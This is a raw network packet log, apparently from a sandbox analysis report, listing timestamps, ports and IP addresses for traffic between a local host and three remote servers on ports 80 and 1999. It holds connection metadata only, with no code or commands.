                Jul 5, 2024 07:13:39.153820992 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.153868914 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.153868914 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399852991 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399888992 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399899006 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399916887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399946928 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.399972916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399983883 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.399992943 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400017977 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400031090 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400177002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400188923 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400198936 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400222063 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400240898 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400356054 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400367022 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400399923 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400501013 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400512934 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400521994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400532007 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400541067 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400547028 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400552034 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400569916 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400582075 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400932074 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400943995 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400952101 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400963068 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400974035 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400979042 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400984049 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.400993109 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.400995970 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401006937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401009083 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401017904 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401032925 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401057005 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401428938 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401441097 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401474953 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401578903 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401590109 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401599884 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401638031 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401638031 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401684999 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401695967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401705027 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401715040 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401731014 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401734114 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401743889 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401757002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401757956 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401767969 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401776075 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401781082 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.401798964 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.401819944 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402542114 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402551889 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402559996 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402565002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402574062 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402589083 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402592897 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402599096 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402601957 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402610064 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402620077 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402626991 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402631044 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402642012 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402652025 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402653933 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402662039 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402668953 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402673960 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.402693033 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.402717113 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403475046 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403486967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403496027 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403506994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403517962 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403525114 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403529882 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403536081 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403543949 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403553963 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403554916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403565884 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403577089 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403577089 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403589010 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403599977 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403601885 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403611898 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403614998 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.403635979 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.403657913 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404412985 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404424906 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404433966 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404444933 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404460907 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404460907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404473066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404494047 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404503107 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404503107 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404505014 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404515982 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404521942 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404529095 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404539108 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404541016 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404551983 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404555082 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404563904 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404572964 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.404583931 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404597044 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.404608011 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405360937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405374050 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405385017 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405397892 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405410051 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405411005 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405421972 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405432940 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405442953 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405447960 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405456066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405467987 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405476093 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405483961 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405483961 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405498028 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405509949 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405520916 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.405524015 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405563116 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.405575991 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406297922 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406311989 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406322002 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406332970 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406343937 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406348944 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406357050 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406368971 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406372070 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406380892 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406393051 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406404018 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406405926 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406416893 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406426907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406430006 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406444073 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406447887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406455994 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.406466961 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.406500101 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407114983 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407134056 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407144070 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407156944 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407169104 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407176971 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407181978 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.407190084 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407212019 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.407234907 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.494153023 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.494230032 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653062105 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653100967 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653114080 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653132915 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653151989 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653259993 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653270960 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653280973 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653291941 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653304100 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653310061 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653326988 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653342009 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653623104 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653635025 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653644085 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653655052 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653665066 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653673887 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653675079 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.653700113 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.653719902 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:39.746922016 CEST8064544103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:39.746973038 CEST6454480192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:42.080499887 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.085385084 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:42.085459948 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.090737104 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:42.095496893 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.081737041 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.123523951 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.395701885 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.400065899 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.404902935 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:43.406738043 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:43.411611080 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.180275917 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.233104944 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.234235048 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.239100933 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.489770889 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.491673946 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.496591091 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.496680021 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.500586987 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:44.505352974 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:44.512233019 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.517153978 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:44.517234087 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.517435074 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:44.522214890 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:44.529773951 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.140240908 CEST8064547178.237.33.50192.168.2.5
                Jul 5, 2024 07:13:45.140297890 CEST6454780192.168.2.5178.237.33.50
                Jul 5, 2024 07:13:45.161081076 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:45.165946007 CEST | 1999 | 64545 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:45.502269983 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:45.545408964 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:45.806333065 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:45.810776949 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:45.815535069 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:45.815584898 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:45.820388079 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.164524078 CEST | 80 | 64547 | 178.237.33.50 | 192.168.2.5
                Jul 5, 2024 07:13:46.164587975 CEST | 64547 | 80 | 192.168.2.5 | 178.237.33.50
                Jul 5, 2024 07:13:46.472400904 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.472475052 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.472491980 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.472523928 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.477080107 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.477092028 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.477129936 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.724832058 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.724888086 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.724900961 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.724932909 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.725034952 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725048065 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725073099 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.725246906 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725315094 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725327015 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725357056 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.725491047 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725502968 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.725542068 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.978511095 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978555918 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978569031 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978605032 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.978641987 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978653908 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978681087 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.978859901 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978923082 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978935003 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.978952885 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.978987932 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.979051113 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.979063034 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.979110003 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.979716063 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.979764938 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.979777098 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.979818106 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:46.979890108 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:46.980287075 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.071830034 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.154966116 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.230176926 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230201960 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230214119 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230249882 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.230307102 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230319977 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230348110 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.230439901 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.230478048 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.230515003 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231084108 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231121063 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.231147051 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231158972 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231185913 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.231285095 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231297016 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231348038 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.231874943 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231928110 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231939077 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.231973886 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.232202053 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.232253075 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.232265949 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.232300043 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.232314110 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.232407093 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.232419968 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.232459068 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.233030081 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.233093977 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.233104944 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.233133078 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
                Jul 5, 2024 07:13:47.233248949 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.233259916 CEST | 1999 | 64546 | 103.237.87.32 | 192.168.2.5
                Jul 5, 2024 07:13:47.233287096 CEST | 64546 | 1999 | 192.168.2.5 | 103.237.87.32
